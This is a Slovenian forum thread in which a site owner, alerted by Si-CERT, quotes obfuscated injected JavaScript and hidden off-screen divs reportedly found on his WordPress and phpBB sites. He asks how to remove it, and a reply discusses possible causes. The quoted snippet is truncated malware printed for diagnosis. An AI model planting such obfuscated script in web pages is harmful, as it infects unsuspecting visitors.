Pozor: Vaše spletno mesto širi okužbe
3 naročniki
3 naročniki
Pozdravljeni. Iz Si-CERT sem dobil obvestilo, da je na treh straneh, ki jih imam nameščena programsko koda, ki skuša okužiti obiskovalce vašega spletnega mesta. Koda izgelda bojda takole (jaz je ne najdem):
<style>.ylrarvupxwkzt { position: absolute; top: -1203px; left: -1028px}</style> <div id="zlngnxgfxebva" class="ylrarvupxwkzt">a earbber atay bscjeb epd eb ... izpuščeno ...</div> <div id="pbhtkfqhfbth" class="ylrarvupxwkzt">rpiYwyXXIJ</div>
<script>
var ofrqytwzpnd=(63227404+123126270>19801944?"\x63\x6f\x6e":"\x6a\x74\x6a");
var rpulrmuougd=(1078531426+1051436615>267226681?"re":"jh");
var pfxkoyjcsdwlr=(1689185999<973141110?"r":"\x72\x65");
var fhgunwdesfhagyt=(1356513202>1927054134?"\x61":"\x72");
var ronbllivtlnob=(516191728>2009364578?"xsm":"ret");
var pbhtkfqhfbth=(1428078032+317559238<322585182+1485699567?"p":"\x77");
var umfastzzoidmngrq=(90589121+1752921195>653874396?"\x72\x65\x74\x75\x72":"es");
... izpuščeno ...
Ali je kdo srečal že kaj podobnega in kako se tega rešit? Sam sem pregledal spletne strani z raznimi online malware, antivirus.....scanerji in pravijo, da je vse čisto. Naslova spletnih strani ne bi dajal ker pravijo :Svetujemo vam tudi previdnost pri obisku lastnih spletnih strani, saj ste tudi vi sami izpostavljeni okužbam.
6 odgovorov
OvcaX, HVALA za odgovor. Jasno mi je kar si obrazložil pod točko 2 in 3, kaj si pa mislil pod točko 1 ? Glede na to, da sem imel posodobljene vse strani (jih je bolj malo) razen treh, ki jih gostim prijateljem za HVALA LEPA in sem 14 dni nazaj zamenjal VSA gesla mi ni jasno kako lahko do tega pride. VSE strani so na WP (zadnja verzija in na vse all in one security plugin) in 2 foruma na phpbb3. Server na novo postavljen posodobljen....kako jim vraga rata :-)
